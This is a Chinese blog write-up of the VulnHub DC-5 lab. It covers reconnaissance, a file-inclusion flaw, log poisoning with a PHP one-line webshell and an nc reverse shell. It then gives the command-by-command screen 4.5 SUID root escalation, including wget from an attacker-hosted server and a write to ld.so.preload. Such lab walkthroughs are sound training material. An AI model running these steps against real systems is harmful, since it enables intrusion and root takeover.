IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 渗透DC-5-文件包含 -> 正文阅读

[系统运维]渗透DC-5-文件包含

0x00 环境介绍

本次研究DC系列dc-5渗透提权过程
靶机下载:https://www.vulnhub.com/entry/dc-5,314/

0x01 信息收集

1)IP收集----192.168.213.153

arp-scan -l

2)端口扫描----80/tcp open http nginx 1.6.2

nmap -A -p- 192.168.213.153

3)目录爆破,使用dirbuster,调用kali自带的字典,

字典位置:usr/share/wordlists/dirbuster/

在这里插入图片描述
爆破出有用信息,待下一步渗透使用
目录

0x02 渗透测试

爆破出网站子域名,进入web页面继续信息收集,老规矩观察获取shell的方式
进入到该目录下,发现每次刷新页面底部的标签都会发生变化

通过观察其他的网站目发现,存在变化的目录如下
 疑似存在文件包含,调用file协议查看一下网站目录,发现能够成功读取目录储存文件

但是查看你passwd文件发下并没什么可用的价值,没有发现可登录用户,刊例这个靶机的思路不在用户上面
之前nmap扫描服务器版本为nginx 1.6.2,熟悉服务器的小伙伴应该知道,在/var/log/nginx/error.log下存在日志记录,在产生规划file写入命令传输,发现都会被日志给记录下来,那么我们的思路就打开了
我们可以尝试通过file传递写入反弹shell,从而获取到登录

写入一句话php木马

查看日志,观察到已经写入木马


shell连接
蚂蚁宝剑连接
连接成功

使用终端nc反弹shell到kali

反弹到kali后查看你suid文件夹

find / -perm -u=s -type f 2>/dev/null

找到突破口,此软件存在漏洞

查找漏洞脚本

searchsploit screen 4.5


下载脚本至桌面

vim查看发现格式为windows的dos格式,需要转换为linux格式

转换为linux格式

dos2unix 41154.sh

0x03 权限提升

按照脚本内提示提权步骤

执行文件

编译两个文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

编译后tmp下生成新的文件,将两个文件赋予权限传送到靶机

将文件传送到靶机

python -m SimpleHTTPServer  8080

wget http://xxxxx:8080/xxx.zip

传输文件
 靶机执行提权步骤

提权步骤:

根据提权说明

首先输入命令:cd /etc

然后输入命令:umask 000

然后输入命令:screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”

然后输入命令:screen -ls

最后输入命令:/tmp/rootshell,成功提权

渗透结束!

0x04 个人知识点总结

知识点:
文件包含漏洞
screen提权
使用dirbuster配合字典爆破目录

至此DC全系列全部渗透完成

交流学习:
博客:www.kxsy.work
CSND:告白热

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-14 14:33:10  更:2021-08-14 14:33:43 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 19:04:11-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计